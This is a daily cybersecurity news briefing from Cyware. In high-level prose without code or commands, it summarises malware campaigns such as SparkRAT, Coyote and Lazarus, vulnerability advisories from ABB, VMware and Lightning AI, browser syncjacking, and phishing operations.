Cyware Daily Threat Intelligence, January 31, 2025

Daily Threat Briefing • Jan 31, 2025
This website uses cookies and similar technologies to provide essential functionality and improve your experience. Some features, such as demo scheduling and chat support, require marketing cookies to function. By clicking "Accept All", you consent to all cookies. Alternatively, you can customize your preferences, but note that declining marketing cookies will limit certain website features.
Daily Threat Briefing • Jan 31, 2025
Cybercriminals are sharpening their tactics, and Brazilian financial firms are the latest target. The Coyote banking trojan is on the prowl, using malicious Windows LNK files to execute PowerShell scripts that steal data and compromise systems.
Meanwhile, a new browser-based threat is emerging—syncjacking. This attack exploits malicious extensions to hijack browsers, disable security settings, and access stored credentials. In its final stage, attackers gain full control of devices, including cameras and audio, without detection.
Speaking of hidden threats, users of Microsoft Ads are being tricked by fraudulent Google ads leading to phishing pages designed to steal their login credentials. This campaign has persisted for two years, slipping past security filters and mimicking Microsoft’s login process with deceptive precision.
SparkRAT hits Windows, macOS, and Linux devices
Researchers unveiled a surge in attacks leveraging SparkRAT, a cross-platform Remote Access Trojan (RAT) written in GoLang. This open-source tool, initially released on GitHub in 2022, has become a favorite among hackers due to its modular design, and multi-platform feature. This malware is used against macOS users and government bodies. SparkRAT connects to C2 servers via WebSocket and HTTP POST requests. In 2024, links to a North Korean cyber espionage campaign were also found.
Coyote banking trojan targets Brazil
A new wave of cyberattacks using the Coyote banking trojan is focused on financial firms in Brazil. This advanced malware uses harmful Windows LNK (shortcut) files to run PowerShell scripts, allowing data theft and system compromise. The attack starts with an LNK file that executes a PowerShell command to connect to a remote server to download further malware. Coyote establishes secure communication with C2 servers, performs keylogging, and takes screenshots. To defend against these threats, avoid opening unknown LNK files, keep antivirus programs updated, monitor registry changes, and use endpoint detection tools.
Lazarus targets developers with rogue NPM package
North Korea's Lazarus Group launched a major supply chain attack, targeting hundreds of systems globally, named Phantom Circuit. They planted malware in phony versions of genuine software and open-source tools, particularly in the cryptocurrency sector, tricking developers into using them. This allowed the group to rob sensitive data, including passwords and authentication tokens from compromised systems. The attack expanded from 181 targets in Europe to 1,225 victims by December 2024, including many in India and Brazil. The group's new method, embedding malware in legitimate software, allows for long-term access and detection evasion. Researchers identified their control servers, which managed this operation, confirming links to earlier Lazarus activities.
Critical flaw impacts Lightning AI Studio
A critical security flaw was found in the AI development platform Lightning.AI that could have allowed hackers to execute remote code and obtain access to user data. Researchers at Noma discovered a hidden URL parameter that could be manipulated to create phishing links targeting specific users. A security patch was implemented by October 25, 2024. The flaw could expose sensitive data, leading to significant risks. To date, there has been no evidence of exploitation.
ABB issues critical security advisory
ABB issued a security advisory about three critical security flaws, CVE-2024-48841, CVE-2024-48849, and CVE-2024-48852, impacting FLXeon controllers. These flaws affect firmware versions 9.3.4 and older. These flaws can allow remote code execution (RCE), unauthorized access, and information disclosure. ABB recommends upgrading to firmware version 9.3.5 for optimum protection.
Browser syncjacking attack enables device takeover
Researchers alerted about a new attack named "browser syncjacking" that allows harmful extensions to take full control of a targeted browser and device with little user interaction. This new method can circumvent traditional security limits on browser extensions. The attack occurs in three stages. First, a user unknowingly installs a rogue extension, which lets the attacker control the user profile, disable security settings, and access stored credentials and history. In the second stage, the extension can take over the browser which grants full control to attackers, enabling data theft and redirection to phishing sites. The third stage involves device hijacking, allowing attackers to access device cameras, audio, and other applications without detection.
VMware patches five serious flaws
VMware warned of five security flaws in its Aria Operations and Aria Operations for Logs products, warning that hackers could exploit these to gain admin access. Two serious flaws let users elevate access rights. VMware highlighted CVE-2025-22218, which could let a user access credentials for another product. Another flaw lets users with basic access retrieve credentials. There are also medium-risk flaws that can enable stored cross-site scripting (XSS) attacks and a broken access control issue. No workarounds exist, so patching is necessary. Fixes were included in Aria Operations for Logs 8.18.3 and Aria Operations 8.18.3.
Microsoft advertisers phished via Google ads
A recent phishing campaign targeted users of Microsoft's advertising platform using malicious Google Search ads to rob their login details. Although Microsoft does buy ad space on Google, these ads bear harmful links from impostors. The phishing effort persisted for two years, bypassing Google’s security checks. Genuine users are shown a verification challenge via Cloudflare before reaching the phishing page, which imitates Microsoft’s site.
Devil-Traff platform eases phishing
Researchers at SlashNext warned about the Devil-Traff platform, which facilitates phishing attacks by letting hackers send bulk SMS messages with features like sender ID spoofing for brand impersonation. Devil-Traff also supports automated campaigns, letting hackers send thousands of messages quickly. The platform's noteworthy features, like sender ID customization, API integration, and low costs, make it easier for hackers to stage large-scale phishing attacks globally.